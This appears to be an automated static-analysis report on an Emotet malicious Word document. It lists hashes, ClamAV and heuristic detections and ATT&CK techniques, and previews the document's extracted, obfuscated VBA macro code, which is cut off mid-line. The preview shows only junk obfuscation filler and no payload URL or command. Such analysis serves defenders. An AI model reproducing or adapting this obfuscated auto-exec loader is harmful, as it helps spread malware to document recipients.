Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 b9ff09f2a5cc4417…

MALICIOUS

Office (OLE)

Size: 240.0 KB
Created: 2019-10-10 00:27:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: f084494b91e1d61052b8f04de0045c9e
SHA-1: 03ad9704247a2dc3a49274eb2d1aacdb1bff5576
SHA-256: b9ff09f2a5cc441790c6577f731c756ea95af9961e44cf41af17deaa10e18df5
Risk Score: 302

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-7331191-0. Heuristics indicate the presence of obfuscated VBA macros, including an auto-exec loader that uses CreateObject and execution sinks. This strongly suggests the macro's purpose is to download and execute a second-stage payload, a common Emotet behavior.

Heuristics (9)

  • ClamAV: Doc.Downloader.Emotet-7331191-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7331191-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 4 related findings)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present [medium] (OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 65888 bytes
SHA-256: d8506db8f7500b2b58459108bfa93a98d0a5d724cfc18f77baa0f09ca11ed9fe

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "b0957x04x7x0"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "c60c40b06850, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b0cx7b767624, 1, 1, MSForms, TextBox"
Attribute VB_Control = "b791c8040790, 2, 2, MSForms, TextBox"
Attribute VB_Control = "x03091840x0, 3, 3, MSForms, TextBox"
Attribute VB_Control = "c23c8080000, 4, 4, MSForms, TextBox"
Attribute VB_Control = "b3x410931807c, 5, 5, MSForms, TextBox"

Attribute VB_Name = "xb70cb5x1c0"
Function b5x80b080031x()
On Error Resume Next
   'International418 Bergnaum Haven, Elliotthaven, Cayman Islands Dynamic06210 Nolan Fall, Walkerton, Guam
xcc570c7699b0 = True
'Regional8738 Monahan Orchard, Fritzhaven, Malaysia Internal462 Nyah Meadow, Ernsermouth, Portugal
Select Case b405c027801
'Central182 Connelly Fields, South Dionstad, Swaziland Legacy14914 Skiles Flat, New Sonyamouth, Falkland Islands (Malvinas)
         Case c7308c60094
         'Internal495 Hegmann Court, Lake Moniquemouth, Bolivia Regional18355 Powlowski Track, New Meganebury, Western Sahara
         'Investor47562 Delia Walks, West Marleeport, Isle of Man Internal280 Abelardo Wall, East Devanburgh, Fiji
xc6053b9c0b1x = False
'District6584 Littel Mill, Gabriellaland, Armenia Customer2890 Bernier Crossing, Murphytown, Burundi
            b5849b9040494 = b7650cb030b3
            'Chief256 Jonas Flat, Conroyshire, Russian Federation Product1305 Nader Terrace, East Brandyn, Bangladesh
            x084926b0c842 = CInt(x8820268608 - CByte(x7800ccx929c0))
            'Customer5666 Veum Loop, Port Stanford, Singapore Senior9851 Block Knolls, Lake Selina, Spain
            b060092c4x05 = Cos(x6x0004604b)
'Chief6612 Howe Dale, South Christophefurt, Honduras Forward599 Heller Forges, Lake Carlimouth, Georgia
b30c0802940 = True
'Product92447 Rau Road, West Erickaborough, Gibraltar Customer58553 Mose Stream, Hortensehaven, Norway
            x419b9507083x = Rnd(c0b00800500)
            'Principal9494 Ankunding Common, Traceburgh, Cote d'Ivoire Dynamic49254 Mayer Oval, Eraton, Burkina Faso
         Case c4c2100x2c347
         'National295 Schowalter Shoals, East Lisa, Saint Kitts and Nevis Product36108 Glover Pines, East Arturo, Netherlands
            b20000402083b = cb09b183c1xc7
            'Forward6173 Streich Hill, South Yazmin, Trinidad and Tobago International2353 Rogahn Plaza, Nellieview, Cyprus
            b3512ccb00470 = CDbl(b9563150b600)
            'Dynamic11947 O'Reilly Pike, New Rachael, Liberia Global75444 Parker Knoll, West Oda, United States Minor Outlying Islands
End Select
'Lead187 Adrien Rue, New Kendrick, Ghana Internal06546 Kuhic Tunnel, Kautzerview, Slovakia (Slovak Republic)
c700563002680 = True
'Dynamic46527 Huel Burgs, Hegmannside, Guadeloupe Chief048 Maggie Forest, Maybelleborough, Democratic People's Republic of Korea
   'International6519 Green Inlet, West Hildegardport, Sierra Leone Dynamic45997 Predovic Ford, Brianachester, India
c40899004807 = False
'Product724 Wilderman Green, Gulgowskimouth, Senegal Corporate81396 Minnie Glens, East Magdalenastad, Montserrat
Select Case b56x9b40100x
'Global4545 Rippin Point, Vivianport, Niger Legacy8588 Hyatt Harbors, Friesenhaven, Pitcairn Islands
         Case c14c7x4708797
         'Senior928 Champlin Place, Bechtelarmouth, China Customer72274 Stamm Prairie, East Natalia, United States Minor Outlying Islands
         'Chief578 Nicolette Springs, Smithamhaven, Pakistan Global2760 Steuber Crossing, New Bradyview, Svalbard & Jan Mayen Islands
x20c08b0807 = False
'Principal2195 Stracke Brooks, Jacobsonton, Aruba National61841 Block Row, East Dawson, Mongolia
            x00800x127x = c804x600x80
            'Human5490 Madie Run, Delphiaview, Northern Mariana Islands Senior108 Nakia Inlet, Lake Cristinafort, Iraq
            x0402003400 = CInt(b60
... (truncated)